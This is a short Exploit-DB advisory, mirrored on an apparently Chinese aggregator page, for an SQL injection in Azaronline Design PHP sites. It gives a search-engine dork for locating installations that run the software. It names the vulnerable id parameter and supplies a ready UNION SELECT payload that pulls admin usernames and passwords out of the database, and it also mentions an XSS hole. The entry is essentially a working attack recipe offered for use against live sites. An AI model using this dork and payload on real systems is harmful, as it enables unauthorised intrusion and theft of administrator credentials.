Azaronline Design – SQL Injection

• Exploit Database
• 8 阅读

• 作者： XroGuE
  日期： 2010-11-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15391/

• ########################################################################
  # Name: Azaronline Design SQL Injection Vulnerability
  # Vendor: http://azaronline.com
  # Date: 2010-11-02
  # Author: XroGuE
  # Thanks to: Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
  # Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
  # Home: Inj3ct0r.com
  ########################################################################
  ########################################################################
   
  [+] Dork: intext:"Powered By Azaronline.com"
   
  ########################################################################
   
  [+] SQL InjecTion Vulnerability:
   
  [+] vuln: http://[site]/[path]/[news.php],[sgallery.php],[etc]?id=[SQLi]
  
  [+] XPL : UNION all SELECT 1,2,group_Concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from admin
   
  ########################################################################
  
  [+] XSS/HTML InjecTion Vulnerability:
  
  [+] vuln: [SearCh And Find It :P]
  
  ########################################################################